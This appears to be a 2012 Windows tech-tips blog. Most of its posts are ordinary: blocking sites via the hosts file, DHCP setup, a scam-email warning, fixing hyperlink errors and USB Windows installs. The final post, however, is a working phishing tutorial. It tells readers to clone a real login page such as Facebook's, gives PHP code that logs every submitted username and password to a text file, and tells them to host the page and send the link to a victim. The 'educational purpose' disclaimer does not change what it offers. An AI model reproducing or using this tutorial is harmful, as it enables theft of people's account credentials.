Search Here

Saturday 25 August 2012

How to encrypt file in windows ?


Tuesday 21 August 2012

How Parents Can Block Certain Websites from Children ?

To block websites on your home computer without investing in expensive software, here’s the trick (for Windows PCs)

Step 1: Disable Antivirus
  Click the Start button and select Run. Now type the following text in that Run box:
 c:\WINDOWS\system32\drivers\etc\hosts
Right click on the host file and select open with Notepad 
Step 2: Just goto the last line of the file, hit the enter key and type the following:
127.0.0.1 orkut.com
127.0.0.1 facebook.com
127.0.0.1 myspace.com
Save the file and exit. That’s it. None of the above sites will now open on your computer.
You can block as many websites as you like with the above technique. If you want to remove the ban later, open the same file as mentioned in Step 1 and delete the above lines.
Just remember you need a Administrator Account to do this .
any error please comment ..

Wednesday 15 August 2012

How to INSTALL DHCP server in server 2008 ?

Anything you don't understand Please comment ...




Part 2

Part 3 coming soon 

Monday 13 August 2012

Hoax email Coming from china to register and transfer Domain.



Below is the Hoax email continuously send by some Chinese spammer .Please do remember if have any problem with the Domain your Domain name Hosting provider will directly contact you not through the third party  and do remember not to be victim of such email and keep in mind never reply to such email until its from your Domain name hosting provider .   Always remember to contact your Service Provider before you take any Action.

Dear Sir/Madam,


Regarding the Domain name dispute and registration case,we did not receive your any reply form until now. Concerning the mentioned Domains and Net Brand please confirm whether you need register those names by yourselves? If need, please let us know in time, we can send an application form to you. If you think the registration of "Denvi Int'l Co., Ltd" or the use of following domain names will not bring any negative effect to your company, I suggest you can give up to register these domain names, then we can only accept "Denvi Int'l Co., Ltd" application unconditionally. Further questions please contact me in time.

Best Regards,

Felix Wu
Registration Department

Tel:+86-5515184482 || Fax:+86-5515123308

Address:No.1889 ShouChun Road,LuYang District,Hefei,Anhui,China


Error :Can't open any hyper-links. "This operation has been cancelled due to restrictions in effect on this computer." Excel ,Word ,Outlook ,Powerpoint

 "This operation has been cancelled due to restrictions in effect on this computer. Please contact your system administrator." 
                      This error massage made me Mad for 1 hour  when i was troubleshooting my user PC .


You may be able to resolve the issue by resetting Internet Explorer web settings. To do this, follow the steps that correspond to your version of Internet Explorer. 

Option 1 Reset Internet Explorer 9

  1. Start Internet Explorer.
  2. Click the Tools icon, and then click Internet Options.
  3. Click the Advanced tab, and then click Reset.
  4. Click Close when it is completed.
  5. Restart Internet Explorer.


Option 2 

Set IE as default 
 1.  Go to start
 2.Select Default Program below the Device and printer.
 3. Wait for the Program to load
 4. Select Internet explore as defult
 5 Click on OK and close restart Computer 

Edit Registry

If you received this error after uninstalling any application that takes over the HTML open command (including, but not limited to, Chrome & Firefox browsers) you may also need to change the HTM/HTML association in the registry.
  1. Start, click Run, type Regedit in the Open box, and then click OK.
  2. Browse to HKEY_CURRENT_USER\Software\Classes\.html
  3. Right click the value for the .html key and select Modify…
  4. Change the value from "ChromeHTML" to "htmlfile" (or from FireFoxHTML to htmlfile)

Option 3

                    Download the Fix it  Software from Microsoft  and run it .After finished the error checking restart the pc the Fix It will automatically fix the error.

How to install Windows XP ,Vista ,7 from Flash Drive?

There may come a day when you have to install a OS from Flash drive  simply because your notebook don't have CD drive  does not mean you cannot install windows there is an easy way to do So .

1 > Go to http://wintoflash.com/download/en/    and download the  Win to Flash  free version .

2> After your download is  finished Extract the file to Desktop

4> Insert the Windows  OS CD/DVD  (XP ,Win 7) on CD drive

3> Open the Folder you just extracted and double click on Win to-flash

4> Now  select Advance mode  and  Choose the Task  "Transfer windows xp/2003 set-up  to usb drive"
        or "Transfer windows vista/7/2008 set-up to usb drive "  Depends on which boot able disk you are creating.

5> Now Click on Run   and select the Drive For windows should be your CD/DVD drive  and  USB should  be your flash drive.

6> Click on Run  and accept the License agreement then Click OK . It will format the usb drive and install the setup file in your usb drive .
                 After finished the Process  Go the the PC where you want to install the Windows through usb drive .

7> On the computer and go to BIOS setup  Simply by pressing F2  or F12 depends on the computer model  search for boot order  and select 1st Boot device as Flash Drive  or Some Computer have Option to select Boot device on the boot up screen .
                       After you select the 1st boot device as Flash drive  and if everything goes well till now  your computer will Boot with the Flash drive  and you will be able to Install Windows through it.



                                                 any question leave a comment 

Sunday 12 August 2012

How to Making Pissing Page for any website ?

NOTE: This only for educational purpose .Use it in your own risk . I will not take any responsibility for the damage caused by this .

what is is Phishing?
Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.

  So now you have a idea about what is a Phishing site .. so lets start on working how to make it.

1> Make a new folder in your desktop.  
       Open a new Note Pad  and save as log.txt  in the folder

2>  Go to any website login page that you want to  create a Phishing site ,like Facebook.com or Google.com , twitter.com   etc.

3> Right click on the page and Click on VIEW PAGE SOURCE . A new window will open  now Press  CTRL + A copy all code there CTRL + C 

4> Now open a Word Pad or Note Pad and paste the code there CTRL +V . And save as index.php in  the folder you created earlier in Desktop.

4>   Now open new Word Pad  and copy the below code and paste it there  and save as login.php .

<?php
header ('Location: http://www.facebook.com/');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

5> Remember the code " header ('Location: http://www.facebook.com/'); "  The website address you should change to the address you are creating the Phishing Page.

6>  Now open  Index.php  that you saved earlier  and find (CTRL+F)  Action=" http://facebook.com/login.php " 
     after you find it just  add login.php? after action=     
        should look like this  action=login.php? "httpd://facebook.com/login.php .........." .
7> Now got to 000webhost.com  signup there  and upload the file in your account 
       send the link to the victim .  You are done if he login using the link you send him then you will find the login detail in log.txt .